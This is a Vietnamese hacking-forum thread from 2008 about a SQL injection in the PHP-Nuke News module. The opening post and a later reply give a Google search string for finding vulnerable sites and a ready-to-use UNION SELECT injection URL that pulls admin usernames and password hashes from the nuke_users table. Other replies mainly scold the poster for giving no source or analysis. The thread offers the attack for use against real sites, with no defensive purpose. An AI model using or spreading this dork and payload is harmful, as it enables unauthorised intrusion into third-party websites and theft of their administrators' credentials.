[Question] Php Nuke module NEWS |
19/09/2008 03:24:58 (+0700) | #1 | 151963 |
|
lion_king_lovely_1985
Member
|
0 |
|
|
Joined: 05/09/2006 20:13:20
Messages: 156
Location: HTTP://HTVSITE.COM
Offline
|
|
Google Search:
Code:
inurl:modules.php?op=modload&name=News
Example:
Code:
http://site.com/modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21%20FROM%20nuke_users/*
|
|
HỌC THIẾT KẾ WEBSITE | HỌC LẬP TRÌNH WEBSITE | HỌC QUẢN TRỊ WEBSITE | HỌC LẬP TRÌNH PHP & MySQL
HTTP://HTVSITE.COM |
|
|
|
[Question] Re: Php Nuke module NEWS |
19/09/2008 05:34:59 (+0700) | #2 | 151978 |
|
Xuan Hy
Locked
|
0 |
|
|
Joined: 29/06/2008 12:40:55
Messages: 75
Offline
|
|
Trong mấy bài post gần đâu của bồ thì bài nào cũng chỉ có vài cái câu ngắn ngủn cùng với cái link download, mà không có gì bình luận hay phân tích cả. Lần sau khi post bài chú ý chút, vì ít ra cũng nên ghi vài chữ đại loại như:
Đây là một bản . . . của . . . do mình search trên google về.
Dùng nó rất là . . .
và đây là link download . . .
thì sẽ nhìn hay hơn nhiều |
|
|
|
|
[Question] Re: Php Nuke module NEWS |
27/09/2008 13:12:16 (+0700) | #3 | 153122 |
vinh_thekiller
Member
|
0 |
|
|
Joined: 22/02/2008 20:30:19
Messages: 6
Offline
|
|
Em vẫn ko hiểu lỗi này là sao, mong các anh chỉ giúp |
|
|
|
|
[Question] Re: Php Nuke module NEWS |
27/09/2008 13:32:17 (+0700) | #4 | 153126 |
|
gamma95
Researcher
|
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
|
|
Đồng chí nào post bài ko ghi rõ nguồn + phân tích một chút về exploitation thì tui sẽ lock nick. |
|
Cánh chym không mỏi
lol |
|
[Question] Re: Php Nuke module NEWS |
14/10/2008 07:34:48 (+0700) | #5 | 155148 |
|
vnkimlong
Member
|
0 |
|
|
Joined: 30/08/2007 13:53:14
Messages: 67
Offline
|
|
Tóm lại là lên google tìm với từ khóa : inurl:modules.php?op=modload&name=News
Rồi thêm vào website tìm được dòng :
modules.php?op=modload&name=News&file=article&sid=-1%20UNION%20all%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21%20FROM%20nuke_users/*
Và nó sẽ hiện lên user và password của admin (pass được mã hóa và rất khó crack)
|
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|